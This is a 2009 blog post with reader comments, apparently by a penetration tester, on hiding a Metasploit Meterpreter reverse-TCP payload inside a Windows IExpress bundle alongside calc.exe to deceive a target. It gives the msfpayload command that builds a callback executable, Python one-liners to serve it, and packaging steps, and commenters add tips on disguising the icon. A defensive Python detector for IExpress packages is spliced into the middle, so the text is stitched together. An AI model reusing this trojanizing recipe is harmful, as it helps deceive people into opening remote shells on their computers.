Metasploit hearts Microsoft
Monday, March 2, 2009 at 2:24PM
Hiding Meterpreter with IExpress from mubix on Vimeo.
Using IExpress, a built-in tool (XP, not sure about other Windows versions), we package two executables together so that the target is less likely to suspect foul play. Now, I used calc.exe, but you can use anything on both sides of the coin. Use a better game so that it's easier to dupe, or a different malicious executable (leekspin perhaps?).
I'll let your minds take this to the level I know you all are capable of. One caveat is that the icon for the executable is that of the self extractor, which shouldn't be that much of an issue to change, but I don't know off the top of my head of an app that does it, so please comment and let me know if you do.
Commands from video:
- ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.100 LPORT=1080 X > /tmp/academy/bob.exe
- (For python 2.4+) python -m SimpleHTTPServer
- (For python 2.3 -) python -c "from SimpleHTTPServer import test; test()"
- Start -> Run -> iexpress <return>
- Run multi/handler from command line (not shown in video)
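From the defender's side, the useful property of an IExpress package is that it is a self-extracting stub with the bundled files stored inside it as a Microsoft Cabinet (MSCF) archive, so the names of everything it will drop can be read straight from the cabinet's CFFILE directory without running it. The following is an added example, not the author's code: it locates the cabinet header, lists the embedded file names, and checks for the UTF-16 resource names an IExpress stub carries (RUNPROGRAM, POSTRUNPROGRAM, CABINET; treated here as a heuristic), run against a constructed stand-in package that names calc.exe and bob.exe.

```python
import struct

# Resource names used by the IExpress self-extractor stub; matched as UTF-16LE
# because PE resource names are stored that way. Heuristic, not a full PE parse.
IEXPRESS_MARKERS = ("RUNPROGRAM", "POSTRUNPROGRAM", "CABINET")

def list_cab_files(data: bytes, base: int) -> list[str]:
    """Return the file names in the cabinet whose CFHEADER starts at `base`."""
    # CFHEADER layout: "MSCF"(4) reserved(4) cbCabinet(4) reserved(4)
    #   coffFiles(4) reserved(4) verMinor(1) verMajor(1) cFolders(2) cFiles(2) ...
    (coff_files,) = struct.unpack_from("<I", data, base + 16)
    (c_files,) = struct.unpack_from("<H", data, base + 28)
    names, pos = [], base + coff_files
    for _ in range(c_files):
        # CFFILE: cbFile(4) uoffFolderStart(4) iFolder(2) date(2) time(2)
        #   attribs(2) then a NUL-terminated name. Names are never compressed.
        pos += 16
        end = data.index(b"\x00", pos)
        names.append(data[pos:end].decode("ascii", "replace"))
        pos = end + 1
    return names

def inspect_package(data: bytes) -> dict:
    """Flag IExpress-style bundles and report what they would drop."""
    base = data.find(b"MSCF")
    result = {"has_cabinet": base >= 0, "iexpress_markers": [], "dropped_files": []}
    for marker in IEXPRESS_MARKERS:
        if marker.encode("utf-16-le") in data:
            result["iexpress_markers"].append(marker)
    if base >= 0:
        result["dropped_files"] = list_cab_files(data, base)
    return result

def build_sample() -> bytes:
    """Constructed stand-in for an IExpress package: a fake stub prefix with
    one resource-name marker, followed by a minimal cabinet listing two files."""
    entries = b""
    for name in (b"calc.exe", b"bob.exe"):
        entries += struct.pack("<IIHHHH", 0, 0, 0, 0, 0, 0x20) + name + b"\x00"
    folder = struct.pack("<IHH", 0, 0, 0)          # one CFFOLDER, no compression
    coff_files = 36 + len(folder)                   # CFFILE array follows header+folder
    cb_cabinet = coff_files + len(entries)
    header = b"MSCF" + struct.pack("<IIIIIBBHHHHH", 0, cb_cabinet, 0, coff_files,
                                   0, 3, 1, 1, 2, 0, 0, 0)
    stub = b"MZ" + b"\x00" * 62 + "RUNPROGRAM".encode("utf-16-le") + b"\x00" * 16
    return stub + header + folder + entries

if __name__ == "__main__":
    print(inspect_package(build_sample()))
```

On a real package the same scan works because the cabinet sits uncompressed in the stub's resource section; only the file contents inside CFDATA blocks may be compressed, not the directory.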
Links from video:
tagged Microsoft, bob, iexpress, instructional, metasploit, vimeo, virustotal in Hacking
Reader Comments (10)
You can use reshack to extract, view, save, and modify resources such as icons etc. http://angusj.com/resourcehacker/
That is awesome. Just fixed it up. posting screen shots soon.
Iexpress also exists in Vista Not that I would wish that OS on anyone.
Is the video stuck at 1:09? I tried the direct link too, same problem.
I seriously don't know what the deal is, some people are having that issue at 1 minute, some at 4, some not at all.
I posted it on YouTube. Check out http://www.room362.com/archives/440-metasploit-2.html
I tried it on several computers on different networks, same problem. Is there any way that you can upload it again under a different link?
Hey, just used this successfully on a pentest. Good stuff.
If you want to bundle with a VBS script, be aware that the extraction code drops the VBS file (or any file, for that matter) with the 8-character DOS name. For example: testbinary.exe would become testbi~1.exe
When you give the command to run after installation, it would look like: wscript testbi~1.exe
works like a charm :)
jcran
Bitchin! Adding this to a little competition I'm working on. Thanks for the vid (muwahahaha). ; )
To change the icons and other resources of the executable one could use the old, but still working, Resource Hacker - see http://www.angusj.com/resourcehacker/